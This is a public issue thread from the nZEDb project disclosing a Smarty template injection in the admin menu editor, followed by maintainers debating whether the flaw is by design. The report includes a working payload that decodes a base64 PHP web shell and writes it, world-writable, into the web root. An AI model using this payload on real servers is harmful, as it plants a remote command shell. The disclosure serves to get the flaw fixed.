SSTI Vulnerability in Admin Menu Add

[cruatta]

There is a Server Side Template Injection in /admin/menu-edit.php?action=submit, which I'd like to discuss with the community to try and figure out a solution for.

Background

• As an admin nZEDb user, I can add a menu item to an installation of nZEDb by navigating from:
  Home Page -> Admin Panel -> Site Settings -> Menu Items -> Add

And then add to the Evaluate field a smarty expression which triggers code execution on the server

{system('echo PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz4= | base64 -d > /var/www/nZEDb/www/admin/shell.php && chmod 777 /var/www/nZEDb/www/admin/shell.php')}

The above payload drops an example web shell for further exploitation

Expected behaviour

• The Evaluate field is meant to determine if a menu is visible or not. Adding a menu as an admin user should likely not allow you to use Smarty template functions like system() which run arbitrary system commands by design. I understand this might be up for some discussion.

Actual behaviour

• It appears there is no filtering of the functions of the template engine when adding a new menu item. This lets a nZEDb admin user without the ability to run code on the server run arbitrary commands as the user running PHP on the web server.

Steps to reproduce the behaviour

I have created a PoC to demonstrate this along with another vulnerability, which was just patched #2661

https://gitlab.com/cruatta/nzedb-pwn

[Wally73]

As a nzedb admin user I already have full control of the server its on
so spend your time on other things
you're not even using nZEDb

[cruatta]

I'm confused how I made you upset by trying to fix issues in nZEDb. Spending my free time as I wish is my choice. I'm not asking you to do anything you do not want to do and you can ignore my issues and PRs if that would make you feel better. If you would like to collaborate productively, I have a further question.

As a nzedb admin user I already have full control of the server its on

So to clarify, if I sign up as a regular user on nZEDb via the sign up process, and them I'm promoted to an admin level in the admin panel, this gives me code execution on the server by design? If so, then close this issue as not a bug. After reading over much of the code base and using nZEDb, that was not my impression.

[IITuxtmuxII]

Is also not php 7.2 eol?

[DariusIII]

@cruatta If you make an PR i will have a look at it.
@IITuxtmuxII Yes, php 7.2 is EOL and nZEDb is stuck with li3 framework which is not even maintained anymore. I have started porting it to CakePHP, but due to lack of free time i have stopped.

[IITuxtmuxII]

@DariusIII

I have started porting it to CakePHP, but due to lack of free time i have stopped.

I would be very interested in it, would love to see it?
but yaeh free time is always an issue

[niel]

li3 is maintained again. One of the original creators, and main coder, is back and working through the backlog.
I started a CakePHP port, but do not remember how much I committed to a branch.